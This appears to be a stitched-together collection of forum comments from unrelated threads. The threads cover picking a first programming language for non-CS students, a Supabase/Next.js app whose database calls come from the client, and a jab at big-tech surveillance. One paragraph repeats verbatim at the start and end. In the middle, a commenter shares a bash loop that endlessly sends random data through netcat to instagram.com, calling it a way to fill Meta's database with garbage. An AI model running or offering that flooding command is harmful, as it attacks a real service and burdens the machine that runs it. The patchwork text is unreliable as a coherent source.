The main reason to not including python is that students aren't particularly in the CS field, they are learning it as their "augmented skill" (I don't know what it's called bad English). That's why I don't want to force them to learn CS concept which they might not even need.
I was thinking about C so that their fundamentals gets cleared but I think it will be too much for students who aren't into CS. What do you think ?
well if a person decide to use this attack small OSS projects server then we are failed as humanity. I shared this article to fight against big tech surveillance if people use it to damage FOSS project I highly discourage that behavior.
I found this magical command to send 50kb of random text data to meta's server to fill up their database with garbage data. I don't know how to do it on massive scale but at least I am doing my part by running this command 24/7 :)
bash
while true; do echo "$(openssl rand -hex 500000)" | netcat instagram.com 80 & disown; done;
that's exactly what happened with recent project I worked with it's https://spaidyslabs.com/ if you are interested. we just shove whatever worked at the time of developing it and now it just a mess!
no policies protecting the supabase, all the supabase calls are coming from client instead of the backend which makes it so difficult to make it secure. 😭
at this point I think we need a entire rewrite of the database and the nextjs code which takes time and effort 😭😭😭
What policies are preventing users from inserting data?
okay, I just got confused there for a bit actually what's happening is that I have created a policy on SELECT to prevent other users from accessing data of other users and it looks something like auth.uid() = user_id. iirc the policy to prevent INSERT looks something like this: auth.role() = 'authenticated'::text() so yeah only authenticated users can insert data but that doesn't guaranty that client/user/browser will insert correct data.
If you are asking this question then you very likely should not be doing what you’re doing.
yes, I know that's why I am asking for suggestions, I don't have much experience in either supabase or Nextjs but I am learning :)
There are ways to do it safely, but it’s for very very specific circumstances, with very very specific security setups.
okay, so what do you suggest I should do. I can't just shove more policies into the supabase to make it secure I think so the only way to make it secure is to have the server ( vercel ) do all the supabase calls and don't share the supabase url so that the client can't just query supabase. but again the reason I am not doing this is that it will require a very big refactor throughout the codebase. ( which I am terrified of T.T )
The main reason to not including python is that students aren't particularly in the CS field, they are learning it as their "augmented skill" (I don't know what it's called bad English). That's why I don't want to force them to learn CS concept which they might not even need.
I was thinking about C so that their fundamentals gets cleared but I think it will be too much for students who aren't into CS. What do you think ?